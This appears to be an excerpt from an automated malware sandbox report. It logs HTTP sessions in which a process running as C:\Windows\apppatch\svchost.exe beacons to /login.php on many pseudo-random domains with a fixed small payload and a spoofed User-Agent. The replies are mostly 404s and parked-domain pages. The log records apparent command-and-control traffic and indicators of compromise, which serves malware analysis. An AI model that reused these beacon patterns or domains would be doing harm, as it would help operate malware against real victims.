                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.975828886 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qegyval.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.314152002 CEST307INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:37 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Content-Length: 138
                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                              ETag: "663ee226-8a"
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              59192.168.2.46430464.190.63.136806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.688349962 CEST354OUTGET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww16.vofycot.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1724431658.5743798
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.467792034 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:37 GMT
                                                                                                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                              vary: Accept-Encoding
                                                                                                                                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CwBuZLl7wgqV+XNajdiD1pY/fk3CkDg4EeCg8CAl7HcItmfhOmkkdyeCkPqtH3O9tttQFe5iAkyLlFBYLl8dIQ==
                                                                                                                                                                                                              last-modified: Fri, 23 Aug 2024 16:48:37 GMT
                                                                                                                                                                                                              x-cache-miss-from: parking-89b87dbbb-ntdtc
                                                                                                                                                                                                              server: Parking/1.0
                                                                                                                                                                                                              Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 43 77 42 75 5a 4c 6c 37 77 67 71 56 2b 58 4e 61 6a 64 69 44 31 70 59 2f 66 6b 33 43 6b 44 67 34 45 65 43 67 38 43 41 6c 37 48 63 49 74 6d 66 68 4f 6d 6b 6b 64 79 65 43 6b 50 71 74 48 33 4f 39 74 74 74 51 46 65 35 69 41 6b 79 4c 6c 46 42 59 4c 6c 38 64 49 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CwBuZLl7wgqV+XNajdiD1pY/fk3CkDg4EeCg8CAl7HcItmfhOmkkdyeCkPqtH3O9tttQFe5iAkyLlFBYLl8dIQ==><head><meta charset="utf-8"><title>vofycot.com&nbsp;-&nbsp;This website is for sale!&nbsp;-&nbsp;vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and best
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.468650103 CEST1236INData Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f
                                                                                                                                                                                                              Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com hAECas it all. We hope you find what you are searching for!"><link rel="icon" type="ima
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.468663931 CEST1236INData Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d
                                                                                                                                                                                                              Data Ascii: ay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visibl
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.471925020 CEST1236INData Raw: 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c
                                                                                                                                                                                                              Data Ascii: ton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.annou
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.471935987 CEST1236INData Raw: 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63
                                                                                                                                                                                                              Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint_
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.475547075 CEST1236INData Raw: 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63
                                                                                                                                                                                                              Data Ascii: in-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.475565910 CEST1236INData Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63
                                                                                                                                                                                                              Data Ascii: ckground-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.478667021 CEST1236INData Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65
                                                                                                                                                                                                              Data Ascii: ransform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.478678942 CEST1236INData Raw: 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61
                                                                                                                                                                                                              Data Ascii: -moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-hei
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.481442928 CEST1236INData Raw: 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31
                                                                                                                                                                                                              Data Ascii: e}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.481455088 CEST1236INData Raw: 4f 39 74 74 74 51 46 65 35 69 41 6b 79 4c 6c 46 42 59 4c 6c 38 64 49 51 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61 69
                                                                                                                                                                                                              Data Ascii: O9tttQFe5iAkyLlFBYLl8dIQ==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid=14460&


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              60192.168.2.464305199.59.243.226806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:36.690232992 CEST356OUTGET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: ww25.lyxynyx.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              Cookie: __tad=1724431658.5024510
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.250704050 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:36 GMT
                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                              content-length: 1226
                                                                                                                                                                                                              x-request-id: 1595c5db-20e1-460e-a512-6d631153ed31
                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ofiBZ6h3hwrwUvFR72pT7pjF+qMbRYNQt+Uqxar8EHy7OyLvsxnF9O7oa+hGKIBhRQkXZOx83tl5LwUsOcNj7w==
                                                                                                                                                                                                              set-cookie: parking_session=1595c5db-20e1-460e-a512-6d631153ed31; expires=Fri, 23 Aug 2024 17:03:37 GMT; path=/
                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 66 69 42 5a 36 68 33 68 77 72 77 55 76 46 52 37 32 70 54 37 70 6a 46 2b 71 4d 62 52 59 4e 51 74 2b 55 71 78 61 72 38 45 48 79 37 4f 79 4c 76 73 78 6e 46 39 4f 37 6f 61 2b 68 47 4b 49 42 68 52 51 6b 58 5a 4f 78 38 33 74 6c 35 4c 77 55 73 4f 63 4e 6a 37 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ofiBZ6h3hwrwUvFR72pT7pjF+qMbRYNQt+Uqxar8EHy7OyLvsxnF9O7oa+hGKIBhRQkXZOx83tl5LwUsOcNj7w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                              Aug 23, 2024 18:48:37.254831076 CEST867INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                              Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTU5NWM1ZGItMjBlMS00NjBlLWE1MTItNmQ2MzExNTNlZDMxIiwicGFnZV90aW1lIjoxNzI0NDMxNzE3LCJwYWdlX3VybCI6I


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              61192.168.2.46430615.197.240.20806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:39.751919031 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qexyhuv.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              62192.168.2.45011664.225.91.73806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:51.246264935 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: qetyhyg.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:51.935988903 CEST816INHTTP/1.1 200 OK
                                                                                                                                                                                                              server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                              date: Fri, 23 Aug 2024 16:48:51 GMT
                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                              content-length: 593
                                                                                                                                                                                                              last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                                                                                                                                              etag: "63f68860-251"
                                                                                                                                                                                                              accept-ranges: bytes
                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED]
                                                                                                                                                                                                              Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              63192.168.2.45011772.52.179.174806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:51.334958076 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              64192.168.2.45011872.52.179.174806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:51.962806940 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gatyhub.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              65192.168.2.45002752.34.198.229806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:54.223489046 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: lygyvuj.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=230ba644e827e5eb69b76dd744835699|8.46.123.33|1724431667|1724431667|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:55.043040991 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:54 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=230ba644e827e5eb69b76dd744835699|8.46.123.33|1724431734|1724431667|33|2|0; path=/; domain=.lygyvuj.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                              66192.168.2.44951744.221.84.10580
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.443649054 CEST373OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                              Host: gahyhiz.com
                                                                                                                                                                                                              Content-Length: 6
                                                                                                                                                                                                              Cookie: btst=61afe5b7d011093f87c495eec767f391|8.46.123.33|1724431669|1724431669|0|1|0; snkz=8.46.123.33
                                                                                                                                                                                                              Data Raw: 9e 84 b5 e8 71 28
                                                                                                                                                                                                              Data Ascii: q(
                                                                                                                                                                                                              Aug 23, 2024 18:48:56.952442884 CEST333INHTTP/1.1 200 OK
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Fri, 23 Aug 2024 16:48:56 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Set-Cookie: btst=61afe5b7d011093f87c495eec767f391|8.46.123.33|1724431736|1724431669|33|2|0; path=/; domain=.gahyhiz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              67192.168.2.456383162.255.119.102806720C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Aug 23, 2024 18:48:58.479394913 CEST268OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                              Referer: http://www.google.com
